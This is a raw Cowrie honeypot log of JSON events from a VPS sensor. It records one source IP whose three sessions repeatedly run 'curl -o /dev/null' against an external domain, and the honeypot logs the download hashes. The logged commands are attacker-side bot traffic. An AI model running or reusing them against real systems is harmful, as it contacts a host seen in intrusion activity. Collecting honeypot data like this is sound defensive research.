{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.635078Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.637833Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.640634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.642603Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.643523Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.649346Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.679227Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.680032Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.683212Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.683835Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.686388Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.689981Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.690564Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.718529Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.719828Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.720483Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.724415Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.724927Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.753206Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.755022Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.756522Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.783322Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.783995Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.786780Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.789038Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.790634Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.791243Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.813958Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.819460Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.820050Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.822821Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.824819Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.829103Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.829654Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.831987Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.834161Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.835226Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.835597Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.863721Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.865785Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.868375Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.870800Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.872101Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.872607Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.875196Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.876222Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.899789Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.900361Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.909687Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.912373Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.913533Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.914080Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.929579Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.930157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.932714Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.935254Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.936514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.937163Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.944131Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.958373Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.959018Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.968258Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.968801Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.971638Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.972004Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.995733Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.996759Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.997360Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.003276Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.005304Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.005965Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.011265Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.011773Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.040638Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.041337Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.043348Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.044027Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.047289Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.049759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.050895Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.051479Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
